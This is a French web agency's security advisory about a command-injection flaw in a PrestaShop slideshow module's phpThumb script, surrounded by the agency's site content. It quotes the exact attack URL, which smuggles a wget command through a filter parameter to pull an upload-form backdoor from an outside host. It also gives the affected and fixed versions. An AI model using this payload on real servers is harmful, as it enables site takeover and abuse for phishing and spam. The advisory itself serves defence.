Bienvenue sur le site de Rhinoferos, agence de communication globale, web, studio graphique et audiovisuel sur Avignon



NOS ACTIVITÉS
 
rhinoferos.com
actualités rhinoferos.com

rhinoferos.com photos LES INFOS .COM



<< Retour
Faille de sécurité Prestashop
par Pascal SALOU

Après recherches sur internet, cette faille ne semble pas être rendue publique, et à ce stade vérifiée sur une version 1.6.0.9. Nous pensons néanmoins qu'elle ne date pas d'hier.

 

L'attaquant injecte un fichier sur votre serveur dans le répertoire modules/pm_adsandslideshow/phpThumb/ en se servant du code suivant dans l'url de votre domaine (method GET) :

modules/pm_adsandslideshow/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ;wget http://un-domaine-secret.com/libraries/novo/wp.php;&phpThumbDebug=9

 

Nous ne divulgons pas le domaine en gras par mesure de sécurité. Il est d'ailleurs fort probable que les responsables de ce domaine effacent prochainement les fichiers qui permettent l'utilisation de cette faille.

 

Si vous pensez être vulnérable contactez-nous en message privé, nous testerons votre domaine.

 

Le fichier wp.php ainsi déposé est un formulaire d'upload qui permet de charger ensuite ce qu'on veut. Il pourrait porter sans nul doute un autre nom dans votre répertoire, ou se situer ailleurs. La plupart du temps les attaquants uploadent un fichier très connu permettant de prendre le contrôle d'un site, voire d'un serveur en vue de pratiquer phishing, spaming et pharmahack. De quoi vous faire blacklister en quelques minutes.

 

C'est sous la version 1.3.2 du module adsandslideshow que cette faille a été exploitée pour ceux qui l'auraient encore. Comblée par un fix sur la 1.4. Nous recommandons vivement la mise à jour vers la version 1.5.6.



Faille de sécurité Prestashop
 
Consultez d'autres articles
Le responsive design, incontournable pour votre site ? par Pascal SALOU
Le site One-Page marque t-il un élan de modernité ? par Pascal SALOU
Quelques règles de base pour votre futur site internet Par Virgil MALARA
 


Nos actualités

agence de communication Avignon
lire toutes les actualités
 
boliviens
4 étudiants boliviens chez les grands chefs d'Avignon
4 étudiants boliviens chez les grands chefs d'Avignon
Le festival La Gourmandise, dont l'agence Rhinoferos a réalisé toute la communication rentre de Bolivie et se poursuit à Avignon.…lire la suite
Grande réussite de la société Adap'Table au salon Paris Healtcare Week
Grande réussite de la société Adap'Table au salon Paris Healtcare Week
Notre agence a réalisé le stand de la société Adap'Table, dont nous réalisons toute la communication depuis de longues années,…lire la suite
pe
refonte site People and Events
refonte site People and Events
Refonte du site People and Events. Nouveau graphisme, nouvelles prestation, technologie responsive...lire la suite
Operation EASY SET dernière ligne droite
Operation EASY SET dernière ligne droite
Comme chaque année depuis 2009, Rhinoferos - EASY SET réalise pour les troupes partenaires des sets de table pendant le…lire la suite

Nos atouts

agence de communication Avignon
En savoir plus
rhinoferos.com Agence de communication AvignonUne analyse professionelle du projet
Entretien préalable sans engagements de votre part entre le graphiste et le développeur pour établir ensemble un projet cohérent et compétitif
rhinoferos.com Agence de communication AvignonUn site qui vous ressemble
Les pages sont réalisées par un graphiste sans les contraintes d’un gestionnaire de contenu Open source. Propositions, retouches sont faites pour un résultat de qualité
rhinoferos.com Agence de communication AvignonUne visibilité sur le web
Les excellents résultats obtenus en référencement naturel (voir exemples) peuvent être accompagnés de campagnes web que nous mettons en place.
rhinoferos.com Agence de communication AvignonUn suivi de qualité
Vous êtes en contact direct avec le développeur pour une assistance gratuite et illimitée. Nous suivons également l’évolution de votre référencement.

Les infos - com

agence de communication Avignon
Lire toutes les infos

Quelques règles de base pour votre futur site internet

Le site One-Page marque t-il un élan de modernité ?

Faille de sécurité Prestashop



Références et témoignages

agence de communication Avignon
lire la suite
plus de témoignages

Mme Sandra Fuhrmann, cabinet d'avocat Furhmann à Lyon

" J'ai fait appel à Rhinoféros pour la création de mon site internet.

Virgil et Pascal ont pris soin de définir mon besoin et d'analyser la concurrence, afin de me soumettre un projet parfaitement adapté, mais surtout original et innovant dans le graphisme et le contenu.

A l'écoute et force de proposition, ils ont fait preuve d'une grande réactivité et…

rhinoferos.com référence INTERLINK
rhinoferos.com référence Moulin de Romanou
rhinoferos.com référence Bédoin location
rhinoferos.com référence Logial
rhinoferos.com référence Lycée Robert Schuman
rhinoferos.com référence Jerlaure
rhinoferos.com référence Voltaire Développements
rhinoferos.com référence A Plus l'annuaire de poche
SARL RHINOFEROS - 546, rue Baruch de Spinoza, Bât. Pierre Thomas - 84916 - AVIGNON Cedex 9 Tél. 04 90 27 38 11ContactMentions légalesCGV© Rhinoferos 2015
En poursuivant votre navigation sur ce site, vous acceptez nos CGV et l'utilisation de cookies pour vous proposer des contenus et services adaptés à vos centres d'intérêts et vous permettre l'utilisation de boutons de partages sociaux.
En savoir plus et gérer ces paramètres
Fermer